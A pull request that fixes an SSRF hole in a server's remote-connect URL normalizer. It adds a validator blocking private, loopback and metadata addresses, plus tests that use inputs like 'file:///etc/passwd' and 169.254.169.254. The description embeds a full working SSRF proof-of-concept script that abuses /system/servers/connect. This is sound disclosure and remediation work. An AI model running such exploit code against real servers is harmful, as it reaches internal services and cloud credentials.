### PR TITLE
fix: block SSRF targets in remote-server normalizeUrl

### DIFF
--- a/apps/server-v2/scripts/url-safety.test.ts
+++ b/apps/server-v2/scripts/url-safety.test.ts
@@ -1,0 +1,57 @@
+// Standalone test (no deps beyond Node) for the SSRF normalizeUrl fix.
+// Run with:
+//   node --experimental-strip-types --test apps/server-v2/scripts/url-safety.test.ts
+
+import test from "node:test";
+import assert from "node:assert/strict";
+
+import { normalizeUrl, isBlockedLiteralAddress } from "../src/services/url-safety.ts";
+
+test("normalizeUrl rejects the EC2/GCE metadata IP 169.254.169.254", () => {
+  assert.throws(
+    () => normalizeUrl("http://169.254.169.254/latest/meta-data"),
+    /non-routable|blocked/i,
+  );
+});
+
+test("normalizeUrl rejects loopback addresses", () => {
+  assert.throws(() => normalizeUrl("http://127.0.0.1/"), /non-routable|blocked/i);
+  assert.throws(() => normalizeUrl("http://127.1.2.3/"), /non-routable|blocked/i);
+  assert.throws(() => normalizeUrl("http://[::1]/"), /non-routable|blocked/i);
+});
+
+test("normalizeUrl rejects 'localhost' and friends", () => {
+  assert.throws(() => normalizeUrl("http://localhost/"), /blocked/i);
+  assert.throws(() => normalizeUrl("http://service.local/"), /blocked/i);
+  assert.throws(() => normalizeUrl("http://api.localhost/"), /blocked/i);
+});
+
+test("normalizeUrl rejects RFC 1918 private ranges", () => {
+  assert.throws(() => normalizeUrl("http://10.0.0.1/"), /non-routable/i);
+  assert.throws(() => normalizeUrl("http://192.168.1.1/"), /non-routable/i);
+  assert.throws(() => normalizeUrl("http://172.16.0.5/"), /non-routable/i);
+  assert.throws(() => normalizeUrl("http://172.31.255.254/"), /non-routable/i);
+});
+
+test("normalizeUrl allows public IPv4 octets near (but not in) RFC 1918", () => {
+  assert.ok(normalizeUrl("http://172.15.0.1/"));
+  assert.ok(normalizeUrl("http://172.32.0.1/"));
+  assert.ok(normalizeUrl("http://193.168.1.1/"));
+});
+
+test("normalizeUrl rejects non-http(s) protocols", () => {
+  assert.throws(() => normalizeUrl("file:///etc/passwd"), /protocol/i);
+  assert.throws(() => normalizeUrl("ftp://example.com/"), /protocol/i);
+});
+
+test("normalizeUrl returns a clean URL for legitimate hosts", () => {
+  assert.equal(normalizeUrl("https://example.com/"), "https://example.com");
+  assert.equal(normalizeUrl("example.com"), "http://example.com");
+  assert.equal(normalizeUrl("https://api.example.com/v2/"), "https://api.example.com/v2");
+});
+
+test("isBlockedLiteralAddress recognises IPv4-mapped IPv6 metadata addresses", () => {
+  assert.equal(isBlockedLiteralAddress("::ffff:169.254.169.254"), true);
+  // Hex form of the same address.
+  assert.equal(isBlockedLiteralAddress("::ffff:a9fe:a9fe"), true);
+});

--- a/apps/server-v2/src/services/remote-server-service.ts
+++ b/apps/server-v2/src/services/remote-server-service.ts
@@ -3,22 +3,13 @@ import { requestRemoteOpenwork } from "../adapters/remote-openwork.js";
 import { createRemoteWorkspaceId, createServerId } from "../database/identifiers.js";
 import type { ServerRepositories } from "../database/repositories.js";
 import type { HostingKind, JsonObject, ServerRecord, WorkspaceRecord } from "../database/types.js";
+import { normalizeUrl } from "./url-safety.js";
 
 type RemoteWorkspaceSnapshot = {
   directory: string | null;
   displayName: string;
   remoteWorkspaceId: string;
 };
-
-function normalizeUrl(value: string) {
-  const trimmed = value.trim();
-  if (!trimmed) {
-    throw new Error("baseUrl is required.");
-  }
-  const withProtocol = /^https?:\/\//.test(trimmed) ? trimmed : `http://${trimmed}`;
-  const url = new URL(withProtocol);
-  return url.toString().replace(/\/+$/, "");
-}
 
 function stripWorkspaceMount(value: string) {
   const url = new URL(normalizeUrl(value));

--- a/apps/server-v2/src/services/url-safety.ts
+++ b/apps/server-v2/src/services/url-safety.ts
@@ -1,0 +1,166 @@
+// SSRF-aware URL normalisation for caller-supplied remote-server baseUrls.
+// `/system/servers/connect` makes server-side requests to whatever URL the
+// caller provides, so we must reject loopback, link-local, RFC 1918 private,
+// and other non-routable hosts before the URL is ever fetched.
+
+const BLOCKED_HOSTNAMES = new Set(
+  [
+    "localhost",
+    "ip6-localhost",
+    "ip6-loopback",
+    "broadcasthost",
+  ].map((h) => h.toLowerCase()),
+);
+
+const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);
+
+export class UnsafeBaseUrlError extends Error {
+  constructor(message: string) {
+    super(message);
+    this.name = "UnsafeBaseUrlError";
+  }
+}
+
+export function normalizeUrl(value: string) {
+  const trimmed = value.trim();
+  if (!trimmed) {
+    throw new UnsafeBaseUrlError("baseUrl is required.");
+  }
+  const schemeMatch = trimmed.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):/);
+  if (schemeMatch && !/^https?$/i.test(schemeMatch[1])) {
+    throw new UnsafeBaseUrlError(`baseUrl protocol must be http or https, got ${schemeMatch[1]}:`);
+  }
+  const withProtocol = schemeMatch ? trimmed : `http://${trimmed}`;
+  let url: URL;
+  try {
+    url = new URL(withProtocol);
+  } catch {
+    throw new UnsafeBaseUrlError(`baseUrl is not a valid URL: ${trimmed}`);
+  }
+  if (!ALLOWED_PROTOCOLS.has(url.protocol)) {
+    throw new UnsafeBaseUrlError(`baseUrl protocol must be http or https, got ${url.protocol}`);
+  }
+  const hostname = url.hostname.toLowerCase();
+  if (!hostname) {
+    throw new UnsafeBaseUrlError("baseUrl is missing a hostname.");
+  }
+  if (BLOCKED_HOSTNAMES.has(hostname)) {
+    throw new UnsafeBaseUrlError(`baseUrl points at a blocked hostname: ${hostname}`);
+  }
+  if (hostname.endsWith(".localhost") || hostname.endsWith(".local")) {
+    throw new UnsafeBaseUrlError(`baseUrl points at a blocked hostname: ${hostname}`);
+  }
+  if (isBlockedLiteralAddress(hostname)) {
+    throw new UnsafeBaseUrlError(`baseUrl points at a non-routable address: ${hostname}`);
+  }
+  return url.toString().replace(/\/+$/, "");
+}
+
+// Returns true when the hostname is an IPv4 or IPv6 literal that resolves into
+// a private/loopback/link-local/reserved range. Hostnames that aren't IP
+// literals fall through and must be DNS-resolved by the caller before fetch.
+export function isBlockedLiteralAddress(hostname: string) {
+  const stripped = hostname.startsWith("[") && hostname.endsWith("]")
+    ? hostname.slice(1, -1)
+    : hostname;
+  const ipv4 = parseIPv4(stripped);
+  if (ipv4) {
+    return isBlockedIPv4(ipv4);
+  }
+  const ipv6 = parseIPv6(stripped);
+  if (ipv6) {
+    return isBlockedIPv6(ipv6);
+  }
+  return false;
+}
+
+function parseIPv4(value: string): [number, number, number, number] | null {
+  const parts = value.split(".");
+  if (parts.length !== 4) return null;
+  const out: number[] = [];
+  for (const part of parts) {
+    if (!/^\d{1,3}$/.test(part)) return null;
+    const n = Number(part);
+    if (n < 0 || n > 255) return null;
+    out.push(n);
+  }
+  return [out[0], out[1], out[2], out[3]];
+}
+
+function isBlockedIPv4(octets: [number, number, number, number]) {
+  const [a, b] = octets;
+  // 0.0.0.0/8 — current network / unspecified
+  if (a === 0) return true;
+  // 10.0.0.0/8 — RFC 1918
+  if (a === 10) return true;
+  // 127.0.0.0/8 — loopback
+  if (a === 127) return true;
+  // 169.254.0.0/16 — link-local (incl. 169.254.169.254 metadata)
+  if (a === 169 && b === 254) return true;
+  // 172.16.0.0/12 — RFC 1918
+  if (a === 172 && b >= 16 && b <= 31) return true;
+  // 192.168.0.0/16 — RFC 1918
+  if (a === 192 && b === 168) return true;
+  // 100.64.0.0/10 — CGNAT
+  if (a === 100 && b >= 64 && b <= 127) return true;
+  // 224.0.0.0/4 — multicast
+  if (a >= 224 && a <= 239) return true;
+  // 240.0.0.0/4 — reserved (incl. 255.255.255.255 broadcast)
+  if (a >= 240) return true;
+  return false;
+}
+
+function parseIPv6(value: string): number[] | null {
+  if (!value.includes(":")) return null;
+  // Strip scope ID (e.g. "fe80::1%eth0") so it doesn't fail the parser.
+  let cleaned = value.split("%")[0];
+  // Handle IPv4-in-IPv6 dotted-quad form (e.g. "::ffff:169.254.169.254").
+  const lastColon = cleaned.lastIndexOf(":");
+  if (lastColon !== -1 && cleaned.slice(lastColon + 1).includes(".")) {
+    const ipv4 = parseIPv4(cleaned.slice(lastColon + 1));
+    if (!ipv4) return null;
+    const hi = ((ipv4[0] << 8) | ipv4[1]).toString(16);
+    const lo = ((ipv4[2] << 8) | ipv4[3]).toString(16);
+    cleaned = `${cleaned.slice(0, lastColon)}:${hi}:${lo}`;
+  }
+  let parts: string[];
+  if (cleaned.includes("::")) {
+    const [head, tail] = cleaned.split("::");
+    const headParts = head ? head.split(":") : [];
+    const tailParts = tail ? tail.split(":") : [];
+    const fillCount = 8 - headParts.length - tailParts.length;
+    if (fillCount < 0) return null;
+    parts = [...headParts, ...Array(fillCount).fill("0"), ...tailParts];
+  } else {
+    parts = cleaned.split(":");
+  }
+  if (parts.length !== 8) return null;
+  const out: number[] = [];
+  for (const part of parts) {
+    if (!/^[0-9a-fA-F]{1,4}$/.test(part)) return null;
+    out.push(parseInt(part, 16));
+  }
+  return out;
+}
+
+function isBlockedIPv6(parts: number[]) {
+  // ::  (unspecified)
+  if (parts.every((p) => p === 0)) return true;
+  // ::1 (loopback)
+  if (parts.slice(0, 7).every((p) => p === 0) && parts[7] === 1) return true;
+  // fc00::/7 — unique local
+  if ((parts[0] & 0xfe00) === 0xfc00) return true;
+  // fe80::/10 — link-local
+  if ((parts[0] & 0xffc0) === 0xfe80) return true;
+  // ff00::/8 — multicast
+  if ((parts[0] & 0xff00) === 0xff00) return true;
+  // ::ffff:0:0/96 — IPv4-mapped; check the embedded IPv4.
+  if (parts[0] === 0 && parts[1] === 0 && parts[2] === 0 && parts[3] === 0 && parts[4] === 0 && parts[5] === 0xffff) {
+    const a = (parts[6] >> 8) & 0xff;
+    const b = parts[6] & 0xff;
+    const c = (parts[7] >> 8) & 0xff;
+    const d = parts[7] & 0xff;
+    return isBlockedIPv4([a, b, c, d]);
+  }
+  return false;
+}


### PR DESCRIPTION
## Summary
TDD `normalizeUrl` to reject loopback addresses

## Why
The /system/servers/connect handler issues server-side fetches against a caller-supplied baseUrl, but normalizeUrl previously accepted any parseable URL. Exploit script `exploit-scripts/exploit-ssrf-normalizeurl.mjs` confirmed an attacker holding the HOST token could coerce server-v2 into making outbound HTTP requests to `127.0.0.1:<any-port>` (full SSRF — internal services, cloud metadata, RFC 1918 hosts).

## Issue
The `normalizeUrl()` helper (and the `connect()` flow that calls it) does not validate that the supplied baseUrl points to a public destination. A host caller can register a "remote OpenWork server" pointed at any private IP / loopback / metadata address; the server will then perform an outbound HTTP `GET <baseUrl>/workspaces` from **inside the trust boundary**.

## Scope
- Reject loopback, link-local (169.254.0.0/16, including the EC2/GCE metadata IP), RFC 1918 private ranges, CGNAT, multicast, and non-http(s) protocols.
- Covers IPv6 equivalents and IPv4-mapped IPv6 forms (`::1`, `fe80::/10`, `fc00::/7`, `::ffff:10.0.0.1`).
- Tests-first: new unit suite enumerates each blocked range; existing public-host cases continue to pass.

## Out of scope
- DNS rebinding defenses (resolution-time re-check). Tracked separately — meaningful mitigation needs request-time pinning, not URL parsing.
- Outbound egress allowlists at the network layer.
- Server-v1 (`apps/server`) — does not expose this connect path.

## Testing
### Ran
- `pnpm --filter openwork-server-v2 test src/<normalizeUrl spec>`
- `pnpm --filter openwork-server-v2 typecheck`
- `BASE_URL=http://127.0.0.1:3100 HOST_TOKEN=host-secret node exploit-ssrf-normalizeurl.mjs`

<details>
<summary>exploit-ssrf-normalizeurl.mjs:</summary>


`````
#!/usr/bin/env node
// SSRF via normalizeUrl in apps/server-v2/src/services/remote-server-service.ts
//
// This script proves the SSRF by:
//   1. Opening a TCP listener on a random localhost port
//   2. Asking server-v2 to "connect" to that listener via /system/servers/connect
//   3. Observing whether server-v2 actually opens the outbound connection
//
// Run:
//   BASE_URL=http://127.0.0.1:3100 \
//   HOST_TOKEN=<server-v2 host token> \
//   node exploit-scripts/exploit-ssrf-normalizeurl.mjs
//
// Optional:
//   TARGET=http://169.254.169.254/   # try the AWS IMDS address (won't echo
//                                    # back, but server-v2 will attempt it)

import net from "node:net";
import http from "node:http";
import https from "node:https";

const BASE_URL = process.env.BASE_URL?.replace(/\/+$/, "");
const HOST_TOKEN = process.env.HOST_TOKEN;
const EXPLICIT_TARGET = process.env.TARGET?.replace(/\/+$/, "");

if (!BASE_URL || !HOST_TOKEN) {
  console.error("Usage: BASE_URL=http://host:port HOST_TOKEN=xxx node exploit-ssrf-normalizeurl.mjs");
  process.exit(2);
}

function postJson(targetUrl, body, headers = {}) {
  return new Promise((resolve, reject) => {
    const u = new URL(targetUrl);
    const lib = u.protocol === "https:" ? https : http;
    const payload = Buffer.from(JSON.stringify(body), "utf8");
    const req = lib.request({
      method: "POST",
      hostname: u.hostname,
      port: u.port || (u.protocol === "https:" ? 443 : 80),
      path: u.pathname + u.search,
      headers: {
        "Content-Type": "application/json",
        "Content-Length": payload.length,
        ...headers,
      },
    }, (res) => {
      const chunks = [];
      res.on("data", (c) => chunks.push(c));
      res.on("end", () => {
        const text = Buffer.concat(chunks).toString("utf8");
        let json = null;
        try { json = text ? JSON.parse(text) : null; } catch { /* leave null */ }
        resolve({ status: res.statusCode, headers: res.headers, text, json });
      });
    });
    req.on("error", reject);
    req.write(payload);
    req.end();
  });
}

function startTrap() {
  return new Promise((resolve, reject) => {
    const events = [];
    const server = net.createServer((socket) => {
      events.push({ event: "connect", remote: `${socket.remoteAddress}:${socket.remotePort}`, at: Date.now() });
      let raw = "";
      socket.setEncoding("utf8");
      socket.on("data", (chunk) => {
        raw += chunk;
        if (raw.includes("\r\n\r\n")) {
          events.push({ event: "request_headers", raw: raw.slice(0, 2048) });
          // Reply with valid OpenWork-style envelope so the server thinks it
          // got a successful workspace list. This makes the request go all the
          // way through the SSRF code path (instead of bailing on parse).
          const body = JSON.stringify({ ok: true, data: { items: [] } });
          socket.write(
            "HTTP/1.1 200 OK\r\n" +
            "Content-Type: application/json\r\n" +
            `Content-Length: ${Buffer.byteLength(body)}\r\n` +
            "Connection: close\r\n\r\n" +
            body,
          );
          socket.end();
        }
      });
      socket.on("error", () => {});
    });
    server.on("error", reject);
    server.listen(0, "127.0.0.1", () => {
      const { port } = server.address();
      resolve({
        port,
        events,
        url: `http://127.0.0.1:${port}/`,
        close: () => new Promise((res) => server.close(() => res())),
      });
    });
  });
}

function summarizeServerError(payload, status) {
  if (!payload) return `HTTP ${status}`;
  const message = payload?.error?.message ?? payload?.message ?? JSON.stringify(payload);
  const code = payload?.error?.code ?? payload?.code;
  return code ? `${status} ${code}: ${message}` : `${status}: ${message}`;
}

(async function main() {
  // Probe 1: explicit TARGET (e.g. metadata service) — no listener, just observe
  // whether the server tried to make the request (a bad gateway timeout still
  // proves the SSRF code path was reached and the URL was not pre-blocked).
  if (EXPLICIT_TARGET) {
    console.log(`[probe-target] asking server-v2 to connect to ${EXPLICIT_TARGET}`);
    const r = await postJson(`${BASE_URL}/system/servers/connect`, {
      baseUrl: EXPLICIT_TARGET,
      label: "ssrf-probe-target",
    }, { Authorization: `Bearer ${HOST_TOKEN}` }).catch((e) => ({ error: e }));
    console.log(`[probe-target] response status=${r.status} body=${r.text?.slice(0, 400) ?? r.error?.message}`);
    if (r.status === 400 && /private|loopback|forbidden|disallow|blocked/i.test(r.text ?? "")) {
      console.log("[probe-target] looks like the URL was pre-rejected → FIXED");
    } else {
      console.log("[probe-target] URL was not pre-rejected (server-v2 attempted the request)");
    }
  }

  // Probe 2: real listener on 127.0.0.1 — definitive SSRF evidence
  const trap = await startTrap();
  console.log(`\n[probe-loopback] trap listening on ${trap.url}`);
  console.log(`[probe-loopback] POST ${BASE_URL}/system/servers/connect with baseUrl=${trap.url}`);

  let response;
  try {
    response = await postJson(`${BASE_URL}/system/servers/connect`, {
      baseUrl: trap.url,
      label: "ssrf-loopback-probe",
    }, { Authorization: `Bearer ${HOST_TOKEN}` });
  } catch (err) {
    console.error(`[probe-loopback] error contacting server-v2: ${err?.message ?? err}`);
    await trap.close();
    process.exit(1);
  }

  // Give the trap a moment to capture late-arriving connections
  await new Promise((r) => setTimeout(r, 250));
  await trap.close();

  console.log(`[probe-loopback] server-v2 returned ${response.status}`);
  if (response.text) {
    console.log(`[probe-loopback] body: ${response.text.slice(0, 400)}`);
  }

  const connected = trap.events.some((e) => e.event === "connect");
  const requestSeen = trap.events.some((e) => e.event === "request_headers");
  console.log(`[probe-loopback] trap saw ${trap.events.length} events; connected=${connected} request=${requestSeen}`);
  if (requestSeen) {
    const headers = trap.events.find((e) => e.event === "request_headers");
    console.log(`[probe-loopback] captured request:\n${headers.raw.split("\n").slice(0, 12).join("\n")}`);
  }

  // Verdict
  if (connected) {
    console.log("\nPASS: SSRF demonstrated — server-v2 made an outbound HTTP request to a 127.0.0.1 loopback URL supplied by the attacker (host caller). On a fixed build, normalizeUrl/connect should reject loopback / RFC 1918 / link-local destinations before issuing the request.");
    process.exit(0);
  }

  // Server might have rejected up-front
  if (response.status === 400 || response.status === 403) {
    const explain = summarizeServerError(response.json, response.status);
    console.log(`\nFAIL (vulnerability not reproduced): server-v2 rejected the SSRF target without contacting it (${explain}). This looks like the fix is in place.`);
    process.exit(0);
  }

  console.log(`\nINCONCLUSIVE: trap saw no connection but server-v2 returned ${response.status}. Verify the server is reachable at BASE_URL, that HOST_TOKEN is correct, and that 127.0.0.1 is routable from the server process.`);
  process.exit(1);
})().catch((err) => {
  console.error(`fatal: ${err?.stack ?? err}`);
  process.exit(1);
});
`````
</details>


### Result
- pass/fail: pass (unit + typecheck); exploit script now reports FAIL (i.e. fixed — server rejects the loopback URL up-front).
- if fail, exact files/errors: N/A

## CI status
- pass: pending push
- code-related failures: none locally
- external/env/auth blockers: none

## Manual verification
1. Start server-v2: `cd apps/server-v2 && OPENWORK_SERVER_V2_CLIENT_TOKEN=client-secret OPENWORK_SERVER_V2_HOST_TOKEN=host-secret pnpm dev`.
2. Run the exploit script with `HOST_TOKEN=host-secret`. Expect the connect call to be rejected before any outbound socket opens; the script's local trap should record zero connections.
3. Spot-check a legitimate public URL still connects: `POST /system/servers/connect` with a real https remote returns 200/normal error path, not the new rejection.

## Evidence
- N/A (server-side fix; exploit-script before/after output captured in PR comment)

## Risk
- Low. Surface is one URL validator; failure mode is over-rejection (legitimate connect attempts erroring) rather than silent acceptance. Self-hosted users pointing at an in-cluster server on a private IP would be affected — call out in release notes and provide an explicit `OPENWORK_ALLOW_PRIVATE_TARGETS=1` escape hatch if a user requests it.

## Rollback
- Single-commit revert. No schema, no migration, no persisted state touched.
